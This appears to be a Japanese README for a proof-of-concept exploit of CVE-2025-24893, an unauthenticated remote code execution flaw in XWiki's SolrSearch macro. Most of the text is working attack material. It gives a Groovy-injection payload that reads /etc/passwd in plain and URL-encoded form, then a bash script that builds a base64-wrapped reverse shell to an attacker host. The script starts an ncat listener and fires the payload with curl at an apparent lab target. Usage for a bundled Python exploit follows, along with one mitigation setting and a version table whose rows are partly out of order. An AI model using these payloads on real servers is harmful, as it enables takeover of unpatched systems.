
CVE-2025-24893 は、人気のあるオープンソースのエンタープライズWikiプラットフォームである XWiki における、深刻な未認証のリモートコード実行(RCE)脆弱性です。
SolrSearch マクロ (XWiki UI)/xwiki/bin/get/Main/SolrSearch エンドポイントは、信頼できない text= 入力
を Freemarker テンプレートに直接連結します。
テンプレートを途中で閉じて、新しい {{groovy}} … {{/groovy}}
ブロックを開くことで、攻撃者は認証なしで任意のGroovyコードを実行できます。
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>> HTTP/1.1
SolrSearch は指定されたテキストをプレーンなコンテンツとして埋め込むはずですが、マクロ
ハンドラーは }}} をエスケープせず、次のようなことが発生します:
}}} 現在のFreemarkerブロックを閉じます。 {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
async=false は同期実行を強制します(ゲストでも動作します)。/etc/passwd を出力する最小のPoC:
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
URLエンコード版(スペース → %20、中括弧 → %7B/%7D など):
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
| ブランチ | 修正版 | 脆弱な ≤ |
|---|---|---|
| 15.x | 15.10.11 | 15.10.10 (および 15.9 / 15.8 のすべて …) |
| 14.x LTS |
(出典: OffSec アドバイザリ および XWiki SEC-S 2025-02)

RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
xwiki_solr_rce.py は exploit/ に同梱されています(下記のコードブロック参照)。
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
ここで
<TARGET URL> - URL including http:// or https://
(シェルの代わりに任意のコマンドを実行するには -c "id" を渡します)

# /etc/xwiki/xwiki.properties
solr.search.enabled = false
研究およびPoC: DeX1d
免責事項: 教育目的のみで使用してください。自分が所有していないシステムに対して実行することは違法です。
| 14.10.17 |
| 14.10.16 |
| 13 / 12 | 保守終了 – すべて脆弱なまま |